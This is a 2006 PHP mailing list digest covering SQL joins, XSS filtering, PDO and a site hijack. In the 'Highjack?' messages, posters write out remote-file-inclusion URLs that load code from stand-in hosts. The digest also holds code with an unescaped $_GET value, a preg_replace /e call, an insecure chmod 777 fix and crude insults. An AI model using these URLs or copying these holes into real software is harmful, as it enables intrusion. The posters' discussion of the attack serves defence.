php-general Digest 14 Nov 2006 18:17:23 -0000 Issue 4459
Topics (messages 244584 through 244605):
Re: one click - two actions?
244584 by: Paul Novitski
244600 by: tedd
PHP firebird driver
244585 by: Jacques Marneweck
Re: Parsing brackets in text
244586 by: Shuping Zhou
Tour Guide around Jordan (Middle East) OFFER
244587 by: Raven.Hawk
244592 by: Google Kreme
244595 by: Ryan A
244596 by: Stut
244598 by: Ryan A
Call to undefined function
244588 by: Tom Chubb
244589 by: Ivo F.A.C. Fokkema
Prevent XSS using DOM Extension and/or SimpleXML
244590 by: Raphael Martins
244594 by: Rob
Re: Mysql strategy
244591 by: Raphael Martins
Re: Scrolling text
244593 by: Google Kreme
PDO::PARAM_LOB and MySQL
244597 by: Chris
244599 by: Roman Neuhauser
Re: Highjack?
244601 by: tedd
244602 by: tedd
php cli and mysql
244603 by: James Tu
244605 by: cajbecu
date() function
244604 by: Ashley M. Kirchner
----------------------------------------------------------------------
--- Begin Message ---
At 11/13/2006 01:28 AM, Mel wrote:
> Could someone please help me figure out how to show some description
> (where applicable) at the same time as I show an image, when I click
> on a link, without repeating the entire query?
> The image and the description are both in the same table in my database.
> I now show the image when I click on the link which is good, but the
> description stays on at all times instead of appearing only when active.
> http://www.squareinch.net/single_page.php
Mel,
I think what you're looking for is JOIN syntax for your queries:
http://dev.mysql.com/doc/refman/4.1/en/join.html
For example:
SELECT * FROM client, job
WHERE client.companyId=job.companyId
AND (client.status='active' or client.status='old')
order by client.companyName;
(Note that when you extract fields from more than one table like
this, you identify the table that each field belongs to, e.g.
client.companyId.)
Then you can extract the desired fields from both tables in the same
loop because they've been captured together. Your current logic
executes a job query for every row of client, which is extremely inefficient.
The dataset produced by the join query is going to look something like this:
client.companyId    job.companyId
1                   2
1                   3
1                   9
2                   4
2                   5
...
In other words, there will be one row for each job record, with the
(parent) client fields duplicated each row.
You can further improve the efficiency of your query by naming only
the fields you need, instead of using * to extract all fields:
SELECT client.companyName, job.pix, job.jobType, job.url, job.web
FROM client, job
WHERE client.companyId=job.companyId
AND (client.status='active' or client.status='old')
order by client.companyName;
Once you execute the join query, your PHP loop can cycle in a similar
way, echoing a company name and then listing all the job types until
a new company name occurs, etc.
You've got other problems, however. If you look at your HTML source,
you'll see markup like this:
<span class='navCompany'>Builtworks</span><span class='navArrow'> > </span>
<span class='navText'><a
href='single_page.php?art=btw_logo.jpg'>logo</a></span>
<span class='navText'><a href='single_page.php?art='></a></span>
<span class='navText'><a href='single_page.php?art='></a></span>
<span class='navText'><a href='single_page.php?art='></a></span>
<span class='navText'><a href='single_page.php?art='></a></span>
<br><span class='navCompany'>Citizens Bank / eProperty</span><span
class='navArrow'> > </span>
<span class='navText'><a
href='single_page.php?art=ctz_web1.jpg'>website</a></span>
All those empty hyperlinks aren't doing anything but making your
download heavier than it has to be. I think you need to test your
'jobType' fields and output only those that aren't blank.
Finally, to answer one of your questions, your logic to display the
description area has a snarl of syntax flaws:
/* query 2 from job */
...
foreach($row as $url)
{
$row = mysql_fetch_array($result2,MYSQL_ASSOC);
if ("url={$row['url']}")
echo "<span class='navText'><a
href='{$row['url']}'>{$row['web']}</ a></span>";
}
You're testing if ("url={$row['url']}")
1) Because you've put that expression in quotes, you're testing the
true/false value of a string expression which will always test true
unless it's blank, which this one will never be.
Expressing it as a string might be correct if you were using eval(),
but you're not and you're safer not to. Eval() can get you into big
trouble if there are PHP code fragments in your database fields;
until you get better control of your logic I urge you not to use it.
2) You omitted the $ in front of $url.
3) You used a single equal sign instead of two. This:
if ($url = $row['url'])
tests whether $row['url'] is blank, and also sets $url equal to that value.
I think you meant this:
if ($url == $row['url'])
which tests whether the variable $url is equal to the database field
$row['url'].
Good luck,
Paul
This is the code I have for the image area:
/* query 1 from client */
$query = "SELECT * FROM client
where status='active' or status='old'
order by companyName";
$result = mysql_query($query)
or die ("Couldn't execute query");
while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
{
echo "<span class='navCompany'>{$aaa['companyName']}</span><span
class='navArrow'> > </span>\n";
/* query 2 from job */
$query = "SELECT * FROM job
WHERE companyId='{$aaa['companyId']}'";
$result2 = mysql_query($query)
or die ("Couldn't execute query2");
foreach($aaa as $jobType)
{
$bbb = mysql_fetch_array($result2,MYSQL_ASSOC);
echo "<span class='navText'><a
href='single_page.php?art=".$bbb ['pix']."'>{$bbb['jobType']}</a></span>\n";
}
echo "<br>";
}
?>
</div>
<div class="navbox3"><?php $image = $_GET['art']; ?>
<img src="images/<?php print ($image)
?>" alt="Portfolio Item"
border="0" width="285" height="285"></div>
This is the code I have for the description area:
/* query 1 from client */
$query = "SELECT * FROM client
where status='active' or status='old'
order by companyName";
$result = mysql_query($query)
or die ("Couldn't execute query");
while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
{
/* query 2 from job */
$query = "SELECT * FROM job
WHERE companyId='{$row['companyId']}'";
$result2 = mysql_query($query)
or die ("Couldn't execute query2");
$url = mysql_query($result2);
foreach($row as $url)
{
$row = mysql_fetch_array($result2,MYSQL_ASSOC);
if ("url={$row['url']}")
echo "<span class='navText'><a
href='{$row['url']}'>{$row['web']}</ a></span>";
}
echo "<br>";
}
?>
--- End Message ---
--- Begin Message ---
At 12:31 PM -0800 11/13/06, Mel wrote:
> I really don't know?
> My site is all php and ready to go live except for this little problem.
> I would really appreciate some help.
> On Nov 13, 2006, at 4:12 AM, John Meyer wrote:
>> Not to be rude or anything, but if you want to do two things with one
>> click, wouldn't the javascript list be the place you would want to go?
Mel:
I think I know what you want, which is when someone clicks
"Bullworks > Logo" (for example) that not only does the Logo appear
on the left, but you want text describing the logo to appear on the
right, correct?
This can be done via an ajax and php combination. You may want to
consider that. Plus, there would be no activity in the url portion of
the user browser -- IMO, it looks cooler.
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--- End Message ---
--- Begin Message ---
Hi,
Does anyone know how the firebird (ibase_pconnect) driver handles link
failure. From what I can see it automatically reconnects to a firebird
database server once the link comes back up without passing back a error
that the database which it connects to has gone away like the
mysql_pconnect does.
Regards
--jm
--
Jacques Marneweck
http://www.powertrip.co.za/
http://www.powertrip.co.za/blog/
#include <std/disclaimer.h>
--- End Message ---
--- Begin Message ---
Actually, preg_replace() can solve Dotan Cohen's problem. There was just a
minor mistake in the code.
Please try this:
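<?php
function makeLink($title) {
    $returnString="<b>$title</b>";
    return $returnString;
}
$articleText="This is a very [long] and [stupid] string.";
// The /e modifier evaluates the replacement string as PHP code for each
// match (deprecated in PHP 5.5, removed in PHP 7.0).
$articleText=preg_replace('/(\[[a-z]+\])/e', "makeLink('$1')", $articleText);
print $articleText;
?>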
--- End Message ---
--- Begin Message ---
Please note >>> if you dont need it now !!!! you may will need it later so
please save it for the future :) :)
Message: Destination: Amman
Season: January - December
Languages: English, Arabic
Minimum Cost: 50 US Dollar (USD) Per day
Maximum Cost: 100 US Dollar (USD) Per day
I have a 6 years experience in tourism and travel experience
In love with tourism I will show the world how beauty my country is. I
have been in this field with people from around the world and I guess
they are all satisfied and happy for the service I offer. Some of my
interests are: Trekking, Mountain-Biking, Geocaching; and places to
see are: historic sites in Saarland, Rheinland-Pfalz and Northern
France. The cities that I specialize in are the following:
- SW Germany
- Northern France
- Luxembourg
- Belgium
- Saarbruecken
- Strasbourg
- Trier
- Metz
Have you ever heard about the roses city? I can show it to you. Would
you like to figure out more about Roman theater? I can tell you.
For More details please contact me at
[EMAIL PROTECTED]
PLEASE NOTE >>>> You can make money if you refer me a clients by
having your own commission directly from the total price of the trip
COST
Contact me for more details
Thanks
----------------------------------------------
This email is send by "Demo Software"
--- End Message ---
--- Begin Message ---
On 14 Nov 2006, at 02:17 , Raven.Hawk wrote:
> Please note >>> if you dont need it now !!!! you may will need it
> later so please save it for the future :)
[CHOMP]
> ----------------------------------------------
> This email is send by "Demo Software"
/me wonders if "Demo Software" is at least written in php...
--
"Send beer, words simply can't adequately express your gratitude" -
James Sedgwick
--- End Message ---
--- Begin Message ---
Google Kreme <[EMAIL PROTECTED]> wrote: On 14 Nov 2006, at 02:17 , Raven.Hawk
wrote:
> Please note >>> if you dont need it now !!!! you may will need it
> later so please save it for the future :)
[CHOMP]
> ----------------------------------------------
> This email is send by "Demo Software"
/me wonders if "Demo Software" is at least written in php...
Don't know if it's written in php or not but it does prove a point....
software is getting more and more user friendly and our pal "Raven Hawk" has
shown us even if both your parents are/were related and you were made fun of in
school for being slow...and married a moron (and probably have little morons
for kids), and live like a moron and spam like a moron you still have enough
brains to figure out how to use present day software....
------
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)
--- End Message ---
--- Begin Message ---
Ryan A wrote:
> Don't know if it's written in php or not but it does prove a point....
> software is getting more and more user friendly and our pal "Raven Hawk" has
> shown us even if both your parents are/were related and you were made fun of in school
> for being slow...and married a moron (and probably have little morons for kids), and live
> like a moron and spam like a moron you still have enough brains to figure out how to use
> present day software....
I seem to deal with a lot of customers who could provide a lot of
evidence for the opposition to that assertion!
-Stut
--- End Message ---
--- Begin Message ---
Stut <[EMAIL PROTECTED]> wrote: Ryan A wrote:
> Don't know if it's written in php or not but it does prove a point....
>
> software is getting more and more user friendly and our pal "Raven Hawk" has
> shown us even if both your parents are/were related and you were made fun of
> in school for being slow...and married a moron (and probably have little
> morons for kids), and live like a moron and spam like a moron you still have
> enough brains to figure out how to use present day software....
>
I seem to deal with a lot of customers who could provide a lot of
evidence for the opposition to that assertion!
Oh well, I guess "Raven Hawk" is one of the more gifted morons and I give
him.., and his kind more credit than deserved.
:)
------
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)
--- End Message ---
--- Begin Message ---
I have just encountered a fatal error using file_put_contents() on a PHP4 box.
After a bit of research I found a simple function within the php.net
user comments.
I just wanted to know what happens if I then tried to run this script
on a PHP 5 box, whereby I'd be defining a function that already
exists.
Should I be changing the name of the function just in case it moves to
PHP5 in the future?
Thanks,
Tom
--- End Message ---
--- Begin Message ---
On Tue, 14 Nov 2006 09:36:52 +0000, Tom Chubb wrote:
> I have just encountered a fatal error using file_put_contents() on a PHP4 box.
> After a bit of research I found a simple function within the php.net
> user comments.
> I just wanted to know what happens if I then tried to run this script
> on a PHP 5 box, whereby I'd be defining a function that already
> exists.
> Should I be changing the name of the function just in case it moves to
> PHP5 in the future?
> Thanks,
Hi Tom,
if (!function_exists('file_put_contents')) {
    function file_put_contents (...)
    {
        // Do it your way!
    }
}
Ivo
--- End Message ---
--- Begin Message ---
Hi there!
I'm building a form validator using PHP and JS. It's working fine by
now, but I want to make a little improvement. Here is how it's working now:
1. The user fills in the form. Every time he leaves the field, the JS
   code matches the value against a regexp to validate.
2. When the user submits the form, the PHP script matches all the
   values against the same regexps.
Now, I want to validate my fields to prevent XSS, allowing my HTML tags
but only the attributes that I want.
I thought of something like this (the tags and the valid attributes):
<?php
$form_html_validation = array(
    "p"=>array(""),
    "a"=>array("href","name","rel"),
    "ol"=>array(""),
    "ul"=>array(""),
    "li"=>array(""),
    "h2"=>array(""),
    "h3"=>array(""),
    "h4"=>array(""),
    "h5"=>array(""),
    "h6"=>array(""),
    "strong"=>array(""),
    "em"=>array("") );
$valid_elements = "<".join("><",array_keys($form_html_validation)).">";
$userInput = strip_tags($userInput,$valid_elements);
//perform DOM Attribute Validation
?>
But I don't know how to loop over every attribute for each tag in the
DomTree.
Does anyone have any ideas?
Thank You
--- End Message ---
--- Begin Message ---
Raphael Martins wrote:
> But I don't know how to loop over every attribute for each tag in the
> DomTree.
Not sure if you need to do this element by element or just want all
attributes, but here are two ways using DOM. They assume $dom is an
already loaded DOMDocument.
1 - Use XPath:

    $xPath = new DOMXPath($dom);
    $nodelist = $xPath->query("//@*");
    foreach ($nodelist AS $attr) {
        print $attr->nodeName." ".$attr->nodeValue."\n";
    }

2 - Walk the tree manually:

    function checkElement($node) {
        $attlist = $node->attributes;
        foreach ($attlist AS $attr) {
            print $attr->nodeName." ".$attr->nodeValue."\n";
        }
        if ($node->hasChildNodes()) {
            foreach ($node->childNodes AS $child) {
                if ($child->nodeType == XML_ELEMENT_NODE) {
                    checkElement($child);
                }
            }
        }
    }
    $root = $dom->documentElement;
    checkElement($root);
Rob
--- End Message ---
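An added example, not code from either poster: it extends the tree walk in the reply above into the attribute check the question asks for, using the question's tag/attribute allowlist. The names ALLOWED, SAFE_SCHEMES, hrefIsSafe() and sanitizeHtml(), the scheme check on href and the sample input are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread. ALLOWED is the allowlist from the
// question; SAFE_SCHEMES and the href check are assumptions.
const ALLOWED = [
    'p' => [], 'a' => ['href', 'name', 'rel'], 'ol' => [], 'ul' => [],
    'li' => [], 'h2' => [], 'h3' => [], 'h4' => [], 'h5' => [], 'h6' => [],
    'strong' => [], 'em' => [],
];
const SAFE_SCHEMES = ['http', 'https', 'mailto'];

function hrefIsSafe(string $value): bool
{
    // Browsers ignore tabs and newlines inside a URL and trim leading
    // whitespace, so strip whitespace/control characters before testing.
    $compact = preg_replace('/[\x00-\x20]+/', '', $value);
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $compact, $m)) {
        return in_array(strtolower($m[1]), SAFE_SCHEMES, true);
    }
    return true; // no scheme: relative URL or fragment
}

function sanitizeHtml(string $html): string
{
    $dom = new DOMDocument();
    $prev = libxml_use_internal_errors(true); // tolerate sloppy user markup
    $dom->loadHTML('<?xml encoding="UTF-8"><body>' . $html . '</body>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $body = $dom->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    $xpath = new DOMXPath($dom);
    // Snapshot each node list first: the tree changes while we loop.
    foreach (iterator_to_array($xpath->query('.//comment()', $body), false) as $c) {
        $c->parentNode->removeChild($c);
    }
    foreach (iterator_to_array($xpath->query('.//*', $body), false) as $el) {
        if ($el->parentNode === null) {
            continue; // already detached
        }
        $tag = strtolower($el->nodeName);
        if (!array_key_exists($tag, ALLOWED)) {
            if ($tag !== 'script' && $tag !== 'style') {
                // Like strip_tags(): drop the tag, keep what it contains.
                while ($el->firstChild !== null) {
                    $el->parentNode->insertBefore($el->firstChild, $el);
                }
            }
            $el->parentNode->removeChild($el);
            continue;
        }
        foreach (iterator_to_array($el->attributes, false) as $attr) {
            $name = strtolower($attr->nodeName);
            $keep = in_array($name, ALLOWED[$tag], true)
                && ($name !== 'href' || hrefIsSafe($attr->nodeValue));
            if (!$keep) {
                $el->removeAttributeNode($attr);
            }
        }
    }

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $dom->saveHTML($child);
    }
    return $out;
}

// Constructed sample input.
$input = '<p onclick="track()">See <a href="/docs" style="color:red" rel="nofollow">'
       . 'the docs</a> and <a href="java&#9;script:void(0)">this</a>.<font>x</font></p>';
echo sanitizeHtml($input), "\n";
```

Because the check runs on the parsed tree, entity-encoded attribute values are already decoded when hrefIsSafe() sees them, which a regexp over the raw string would miss.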
--- Begin Message ---
Larry Garfield wrote:
On Monday 13 November 2006 17:51, Chris wrote:
It's not going to make a great deal of difference if you do the
processing in the MySQL or the PHP, in this case it's basically the same
operation in each. I suspect that efficiently recreating the LIKE
functionality in PHP wouldn't be trivial to do, if you are just doing
straight comparisons the MySQL STRCMP function should be faster.
I'd say there will be a big difference. Pulling in 10,000 entries from
the database and then sorting them in php will take a lot of memory (and
database time to retrieve all of the entries). Getting the database to
restrict that number of entries will take a little time but it doesn't
have to return all entries, your php memory won't blow out and it won't
have bugs in it.
As a general rule, I try to push as much logic into the query as I can for the
simple reason that MySQL is optimized C and my PHP code gets interpreted.
The odds of me writing something in PHP that's faster than MySQL AB's C code
are slim. :-) The exception is grouping, which I've often had to do in PHP
with a loop to rebuild a result array. The performance hit for that is not
that big, however, and if you free() the result set afterward then the memory
usage is not a major issue either.
If you're finding your query is slow, look into your indexes. Just today I
cut a single query from 230 seconds to 21 seconds just by adding two
indexes. :-)
I'm building a system that performs searches based on comma-separated
"tags". I'm using the MySQL FIND_IN_SET function.
:D
--- End Message ---
--- Begin Message ---
On 13 Nov 2006, at 12:22 , Alain Roger wrote:
> I would like to have a scrolling text (as banner) on our website.
er. eww. But OK.
> so, i would like to know if there is another way how to do a
> scrolling text without using flash, shockwave or other tool...only in
> php or HTML (in worse case).
No. If you need to update a page that is already displayed, you need
javascript.
However, the marquee tag should be able to be used without displaying
on multiple lines...
That said, it's an ugly ugly tag and support for it is sparse. Avoid
it. If you really want scrolling text you'd be better off finding
some decent javascript code.
There, those are words I never thought I'd say.
--
"Give a man a fire and he's warm for a day, but set fire to him and
he's warm for the rest of his life."
--- End Message ---
--- Begin Message ---
Hi all.
I'm trying to read binary data from a MySQL 5 database using PDO's
PARAM_LOB stream, but it's not working. It always returns the data as a
string (not a stream).
I've found discussions where other people had this problem, but they all
seem to have been solved by setting the PDO::ATTR_EMULATE_PREPARES
attribute, which didn't work for me.
Here's the script I'm using
http://scratch.leftbrained.org/param_lob.phps
the get_db() function instantiates a named instance of the PDO object,
and returns it (or just returns it if it's already been created, which,
in this script, never happens). That instance, when created, is passed the
PDO::MYSQL_ATTR_USE_BUFFERED_QUERY flag.
I've tried disabling that to see if it affected my problem, and it didn't.
I based this code off the example in the documentation:
http://us2.php.net/manual/en/ref.pdo.php#AEN149844 (Example 12. Displaying an
image from a database)
Any suggestions? It seems to be that it *should* be doing what I want, but it
isn't.
Thanks,
Chris
--- End Message ---
--- Begin Message ---
# [EMAIL PROTECTED] / 2006-11-14 07:57:33 -0800:
> I based this code off the example in the documentation:
>
> http://us2.php.net/manual/en/ref.pdo.php#AEN149844 (Example 12. Displaying
> an image from a database)
>
> Any suggestions? It seems to be that it *should* be doing what I want, but
> it isn't.
File a bug report.
--
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man. You don't KNOW.
Cause you weren't THERE. http://bash.org/?255991
--- End Message ---
--- Begin Message ---
At 7:12 PM +0100 11/13/06, Rory Browne wrote:
> If register_globals is enabled, someone could
> http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
> The script will then include
> http://www.badserver.com/badscript.txt?dummy=script.php
I still don't see how "badscript.php" can be uploaded into
example.com's site in the first place -- unless "badscript.php" is
not part of the evil-doers code but rather just a poor script.
I have noticed that the host has disabled "shell_exec()" since the
attack -- so, I wonder if this was the cause or just a shotgun
approach to server protection. However, he still has register_globals
ON and safe_mode OFF.
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--- End Message ---
--- Begin Message ---
At 12:38 PM -0500 11/13/06, Eric Butera wrote:
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
I don't have a shopping cart script on the site.
However, register_globals are ON, but I turn them off in my scripts.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
I just looked at my logs and they only go back one day -- interesting.
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--- End Message ---
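An added example, not code from any poster in this thread: the log review suggested in the two messages above, written as a PHP CLI script that lists requests whose query string carries a URL as a parameter value. The function name remoteIncludeCandidates(), the access-log format (Apache common/combined) and the sample log lines are assumptions; the host names in the samples are the placeholders used in the messages.

```php
<?php
// Added example, not code from the thread: list requests whose query string
// carries a URL as a parameter value. The log lines below are constructed.
function remoteIncludeCandidates(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $i => $line) {
        // Request line of a common/combined log entry: "METHOD target HTTP/x.y"
        if (!preg_match('#"[A-Z]+ (\S+) HTTP/[\d.]+"#', $line, $m)) {
            continue;
        }
        $pos = strpos($m[1], '?');
        if ($pos === false) {
            continue; // no query string
        }
        // parse_str() splits the query and URL-decodes names and values.
        parse_str(substr($m[1], $pos + 1), $params);
        array_walk_recursive($params, function ($value, $name) use (&$hits, $i, $m) {
            // Decode once more so double-encoded values are caught too.
            $decoded = rawurldecode((string) $value);
            if (preg_match('#^\s*(?:https?|ftps?)://#i', $decoded)) {
                $hits[] = ['line' => $i + 1, 'request' => $m[1],
                           'param' => (string) $name, 'value' => $decoded];
            }
        });
    }
    return $hits;
}

// Constructed sample entries (192.0.2.0/24 is a documentation address range).
$sample = [
    '192.0.2.10 - - [13/Nov/2006:10:01:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '192.0.2.77 - - [13/Nov/2006:10:04:40 -0500] "GET /exploited.php?action=http://evil.example.com/inject.txt HTTP/1.1" 200 312',
    '192.0.2.77 - - [13/Nov/2006:10:05:11 -0500] "GET /badscript.php?path=http%3A%2F%2Fwww.badserver.com%2Fbadscript.txt%3Fdummy%3D HTTP/1.0" 200 298',
    '192.0.2.31 - - [13/Nov/2006:10:09:57 -0500] "GET /images/logo.png HTTP/1.1" 304 -',
];
foreach (remoteIncludeCandidates($sample) as $hit) {
    printf("line %d  %s=%s\n", $hit['line'], $hit['param'], $hit['value']);
}
```

A hit is a lead, not proof: a legitimate parameter such as a return URL matches as well, so check whether the named script passes that parameter to include or require.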
--- Begin Message ---
I'm running a php script from the command line (I'm on OS X) and I'm
getting ...
Warning: mysql_connect(): Can't connect to local MySQL server through
socket '/var/mysql/mysql.sock' (2)
Here's the script (this just tests a connection and a query...the
actual script imports data from text files):
#!/usr/bin/php
<?php
echo "HELLO WORLD\n";
$connection = mysql_connect(HOST, ID, PW);
mysql_select_db(DB, $connection);
$result = mysql_query("SELECT COUNT(*) as num_of_countries from
geo_entities");
$row = mysql_fetch_array($result);
print_r($row);
?>
I tested the script from a browser and the connection and query worked.
Do I have to do something special in order for PHP CLI to connect to
MySQL?
-James
--- End Message ---
--- Begin Message ---
touch /var/mysql/mysql.sock
chmod 777 /var/mysql/mysql.sock
On 11/14/06, James Tu <[EMAIL PROTECTED]> wrote:
> I'm running a php script from the command line (I'm on OS X) and I'm
> getting ...
> Warning: mysql_connect(): Can't connect to local MySQL server through
> socket '/var/mysql/mysql.sock' (2)
> Here's the script (this just tests a connection and a query...the
> actual script imports data from text files):
> #!/usr/bin/php
> <?php
> echo "HELLO WORLD\n";
> $connection = mysql_connect(HOST, ID, PW);
> mysql_select_db(DB, $connection);
> $result = mysql_query("SELECT COUNT(*) as num_of_countries from
> geo_entities");
> $row = mysql_fetch_array($result);
> print_r($row);
> ?>
> I tested the script from a browser and the connection and query worked.
> Do I have to do something special in order for PHP CLI to connect to
> MySQL?
> -James
--- End Message ---
--- Begin Message ---
I noticed that if I do something like this:
$prevminute = date("i")-1;
..and the current minute happens to be '05', $prevminute becomes '4'
- I lose the padding. How can I ensure that I retain that padding? I
suppose a crude solution is to run $prevminute through an if loop to see
if it's < 10. But I'm wondering if there's a better way.
--
W | It's not a bug - it's an undocumented feature.
+--------------------------------------------------------------------
Ashley M. Kirchner <mailto:[EMAIL PROTECTED]> . 303.442.6410 x130
IT Director / SysAdmin / Websmith . 800.441.3873 x130
Photo Craft Imaging . 3550 Arapahoe Ave. #6
http://www.pcraft.com ..... . . . Boulder, CO 80303, U.S.A.
--- End Message ---